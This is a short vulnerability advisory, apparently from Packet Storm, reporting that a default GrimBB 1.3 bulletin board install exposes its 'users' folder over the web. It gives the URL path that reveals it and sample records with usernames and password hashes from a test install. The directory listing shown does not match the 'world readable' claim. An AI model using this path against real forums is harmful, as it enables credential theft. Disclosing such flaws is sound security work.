Grimbb version 1.3 suffers from a username and password hash disclosure vulnerability.
cb1da872a1bdab61a8fca9ab3b8b9d2a25b3543c63e5462396e1f7ac5dc8e5bb
Grimbb V1.3 User and Password Hash Disclosure
==============================================
Discovered by N_A, N_A[at]tutanota.com
=======================================
Description
============
A PHP 4 Open Source Flat File Based Bulletin Board System -> GrimBB uses text files to store the data for posts (doesn't need outside database like MySQL). Its easy to configure (only two distribution files require changes to achieve immediate results).
https://sourceforge.net/projects/grimbb
Vulnerability
==============
After a *default* installation of Grim Bulletin Board v 1.3 permissions for the 'users' folder is world readable resulting in full disclosure of
stored usernames and password hashes
root@kali:/var/www/html/grimbb# ls -al
.........
.........
drwx------A 2 www-data www-dataA 4096 NovA 5 18:13 users
root@kali:/var/www/html/grimbb#
Exploitation
=============
Go to the following URL:
http://127.0.0.1/grimbb/users
Files containing usernames and hashes are readble, examples below:
type = 3
name = "jimmy"
pass = "15dfb4e0bc6ec941b33bbf26f532116b"
logdate = "201611"
register = "201611051813390"
userip = *********
type = 0
name = "admin"
pass = "d7e20b780957b7ba1b3b82fd76cf1485"
logdate = "201611"
register = "201611051634460"
userip = **********
type = 3
name = "pentest"
pass = "185eb48dec37cdedb5713c104841941d"
logdate = "201611"
register = "201611051813140"
userip = **********
Email
======
N_A[at]tutanota.com
--
Securely sent with Tutanota. Claim your encrypted mailbox today!
https://tutanota.com
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed